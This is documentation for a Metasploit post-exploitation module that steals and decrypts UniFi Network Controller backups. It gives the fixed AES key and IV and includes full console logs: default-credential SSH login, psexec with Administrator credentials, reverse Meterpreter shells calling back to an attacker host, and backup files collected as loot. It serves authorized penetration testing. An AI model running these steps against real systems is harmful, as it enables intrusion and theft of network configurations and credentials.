CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
Views: 11789

Vulnerable Application

This module works against UniFi Network Controller (5.10.19-5.10.23 confirmed, most likely others), to download any backup and autobackup files (.unf extension). These files are AES encrypted zip files which use the IV ubntenterpriseap and key bcyangkmluohmars. The unf zip file is then decrypted, however it contains an error in the file. Utilizing zip -FF the file can be repaired and opened (some reports say 7zip can open the errored file). If zip is available on the system, this operation is performed and the result saved to loot as well.

Due to the potential large file sizes of the backups, meterpreter is greatly encouraged over a shell.

This work is based on zhangyoufu's unifi-backup-decrypt and justingist's POSH-Ubiquiti.

The unf file has the following actions performed:

  1. Decrypt the file

  2. Fix the zip file if a zip utility is on the system

  3. Extract db.gz

  4. Unzip the db file

  5. Import the db file

Install Instructions

  1. Download the file from https://www.ui.com/download/unifi (Java required on Windows)

  2. Install with default parameters

  3. Login to https://localhost:8443/manage and click the gear icon in the bottom left

  4. Select Maintenance then click DOWNLOAD BACKUP to create the backup file.

Verification Steps

  1. Install the application

  2. Get a shell

  3. Do: use post/multi/gather/ubiquiti_unifi_backup

  4. Do: set session #

  5. Do: run

Scenarios

Ubiquiti Unifi Controller 5.10.19 (Build: atag_5.10.19_11646) on Ubuntu 18.04

Initial Access

[*] Processing unifi.rb for ERB directives. resource (unifi.rb)> use auxiliary/scanner/ssh/ssh_login resource (unifi.rb)> set username unifi username => unifi resource (unifi.rb)> set password unifi password => unifi resource (unifi.rb)> set rhosts 2.2.2.2 rhosts => 2.2.2.2 resource (unifi.rb)> run [+] 2.2.2.2:22 - Success: 'unifi:unifi' 'uid=1000(unifi) gid=1000(unifi) groups=1000(unifi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare) Linux unifi 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ' [*] Command shell session 1 opened (1.1.1.1:33389 -> 2.2.2.2:22) at 2019-03-10 15:58:18 -0400 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed resource (unifi.rb)> sessions -u 1 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1] [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 1.1.1.1:4433 [*] Sending stage (985320 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:4433 -> 2.2.2.2:37124) at 2019-03-10 15:58:25 -0400 [*] Command stager progress: 100.00% (773/773 bytes)

Module

resource (unifi.rb)> use post/multi/gather/ubiquiti_unifi_backup resource (unifi.rb)> set verbose true verbose => true resource (unifi.rb)> set session 2 session => 2 resource (unifi.rb)> run [*] File /var/lib/unifi/system.properties saved to /root/.msf4/loot/20190310155835_default_2.2.2.2_ubiquiti.system._487688.txt [+] Read UniFi Controller file /var/lib/unifi/system.properties [-] Directory doesn't exist: /data/autobackup [+] Found backup folder: /var/lib/unifi/backup [+] File /var/lib/unifi/backup/5.10.19.unf saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_802011.unf [+] File 5.10.19.unf DECRYPTED and saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_933774.zip. File needs to be repair via `zip -FF` [*] Attempting to repair zip file (this is normal) [+] File /var/lib/unifi/backup/5.10.19.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_271407.zip. [*] Post module execution completed

Details

msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: uid=1000, gid=1000, euid=1000, egid=1000 meterpreter > sysinfo Computer : 2.2.2.2 OS : Ubuntu 18.04 (Linux 4.18.0-16-generic) Architecture : x64 BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > background [*] Backgrounding session 2... msf5 post(multi/gather/ubiquiti_unifi_backup) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 2.2.2.2 ubiquiti.system.properties /var/lib/unifi/system.properties text/plain /root/.msf4/loot/20190310155835_default_2.2.2.2_ubiquiti.system._487688.txt 2.2.2.2 ubiquiti.unifi.backup 5.10.19.unf application/zip Ubiquiti Unifi Controller Encrypted Backup Zip /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_802011.unf 2.2.2.2 ubiquiti.unifi.backup_decrypted 5.10.19.unf.broken.zip application/zip Ubiquiti Unifi Controller Decrypted Broken Backup Zip /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_933774.zip 2.2.2.2 ubiquiti.unifi.backup_decrypted_repaired 5.10.19.unf.zip application/zip Ubiquiti Unifi Controller Backup Zip /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_271407.zip

Ubiquiti Unifi Controller 5.10.19 (Build: atag_5.10.19_11646) on Windows 2012

Initial Access

[*] Processing unifi.rb for ERB directives. resource (unifi.rb)> use exploit/windows/smb/psexec resource (unifi.rb)> set smbpass Password123 smbpass => Password123 resource (unifi.rb)> set smbuser Administrator smbuser => Administrator resource (unifi.rb)> set rhosts 4.4.4.4 rhosts => 4.4.4.4 resource (unifi.rb)> run [*] Started reverse TCP handler on 1.1.1.1:4444 [*] 4.4.4.4:445 - Connecting to the server... [*] 4.4.4.4:445 - Authenticating to 4.4.4.4:445 as user 'Administrator'... [*] 4.4.4.4:445 - Selecting PowerShell target [*] 4.4.4.4:445 - Executing the payload... [+] 4.4.4.4:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (179779 bytes) to 4.4.4.4 [*] Meterpreter session 3 opened (1.1.1.1:4444 -> 4.4.4.4:61034) at 2019-03-10 15:58:32 -0400 meterpreter > background [*] Backgrounding session 3...

Module

resource (unifi.rb)> use post/multi/gather/ubiquiti_unifi_backup resource (unifi.rb)> set verbose true verbose => true resource (unifi.rb)> set session 3 session => 3 resource (unifi.rb)> run [*] File C:\Users\Administrator\Ubiquiti UniFi\data\system.properties saved to /root/.msf4/loot/20190310155838_default_4.4.4.4_ubiquiti.system._035659.txt [+] Read UniFi Controller file C:\Users\Administrator\Ubiquiti UniFi\data\system.properties [+] Found backup folder: C:\Users\Administrator\Ubiquiti Unifi\data\backup [+] File C:\Users\Administrator\Ubiquiti Unifi\data\backup/5.10.19.unf saved to /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_024488.unf [+] File 5.10.19.unf DECRYPTED and saved to /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_661494.zip. File needs to be repair via `zip -FF` [*] Attempting to repair zip file (this is normal) [+] File C:\Users\Administrator\Ubiquiti Unifi\data\backup/5.10.19.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_212269.zip. [*] Post module execution completed [*] Starting persistent handler(s)...

Details

msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-OBKF2JFCDKL OS : Windows 2012 (Build 9200). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > background [*] Backgrounding session 3... msf5 post(multi/gather/ubiquiti_unifi_backup) > loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 4.4.4.4 ubiquiti.system.properties C:\Users\Administrator\Ubiquiti UniFi\data\system.properties text/plain /root/.msf4/loot/20190310155838_default_4.4.4.4_ubiquiti.system._035659.txt 4.4.4.4 ubiquiti.unifi.backup 5.10.19.unf application/zip Ubiquiti Unifi Controller Encrypted Backup Zip /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_024488.unf 4.4.4.4 ubiquiti.unifi.backup_decrypted 5.10.19.unf.broken.zip application/zip Ubiquiti Unifi Controller Decrypted Broken Backup Zip /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_661494.zip 4.4.4.4 ubiquiti.unifi.backup_decrypted_repaired 5.10.19.unf.zip application/zip Ubiquiti Unifi Controller Backup Zip /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_212269.zip

Ubiquiti Unifi Controller 5.10.20 on OSX 10.14.4

Module

msf5 post(multi/gather/ubiquiti_unifi_backup) > rexploit [*] Reloading module... [+] Read UniFi Controller file /Users/unifi/Library/Application Support/Unifi/data/system.properties [+] File /Users/unifi/Library/Application Support/UniFi/data/backup/5.10.20.unf saved to /root/.msf4/loot/20190406110342_default_1.1.1.1_ubiquiti.unifi.b_683102.unf [+] File 5.10.20.unf DECRYPTED and saved to /root/.msf4/loot/20190406110342_default_1.1.1.1_ubiquiti.unifi.b_122303.zip. File needs to be repair via `zip -FF` [*] Attempting to repair zip file (this is normal) [+] File /Users/unifi/Library/Application Support/UniFi/data/backup/5.10.20.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190406110342_default_1.1.1.1_ubiquiti.unifi.b_728913.zip. [*] Post module execution completed

Using a SHELL With Multiple Larger Backups on Ubiquiti Unifi Controller 5.10.23

An example of the output when not utilizing meterpreter (just a shell) to access the files. The solution is to upgrade to meterpreter, which will work successfully.

msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell linux SSH unifi:unifi (1.1.1.1:22) 2.2.2.2:35125 -> 1.1.1.1:22 (1.1.1.1) 2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 1.1.1.1 2.2.2.2:4433 -> 1.1.1.1:52584 (1.1.1.1) msf5 post(multi/gather/ubiquiti_unifi_backup) > session -i 1 l[-] Unknown command: session. msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 1 [*] Starting interaction with 1... ls -lah /var/lib/unifi/backup/*.unf -rw-r----- 1 unifi unifi 15K Mar 22 21:15 /var/lib/unifi/backup/5.10.19.unf -rw-r----- 1 unifi unifi 3.3M May 10 13:59 /var/lib/unifi/backup/5.10.20.unf -rw-r----- 1 unifi unifi 3.3M May 10 14:26 /var/lib/unifi/backup/5.10.23.unf ^Z Background session 1? [y/N] y msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1 session => 1 msf5 post(multi/gather/ubiquiti_unifi_backup) > run [!] SESSION may not be compatible with this module. [+] Read UniFi Controller file /var/lib/unifi/system.properties [+] File /var/lib/unifi/backup/5.10.19.unf saved to /root/.msf4/loot/20190510150128_default_1.1.1.1_ubiquiti.unifi.b_313804.unf [+] File 5.10.19.unf DECRYPTED and saved to /root/.msf4/loot/20190510150128_default_1.1.1.1_ubiquiti.unifi.b_129165.zip. File needs to be repair via `zip -FF` [*] Attempting to repair zip file (this is normal) [+] File /var/lib/unifi/backup/5.10.19.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190510150128_default_1.1.1.1_ubiquiti.unifi.b_016198.zip. [-] /var/lib/unifi/backup/5.10.20.unf read at 0 bytes. Either file is empty or error reading. If this is a shell, you need to upgrade to meterpreter!!! [-] /var/lib/unifi/backup/5.10.23.unf read at 0 bytes. Either file is empty or error reading. If this is a shell, you need to upgrade to meterpreter!!! [*] Post module execution completed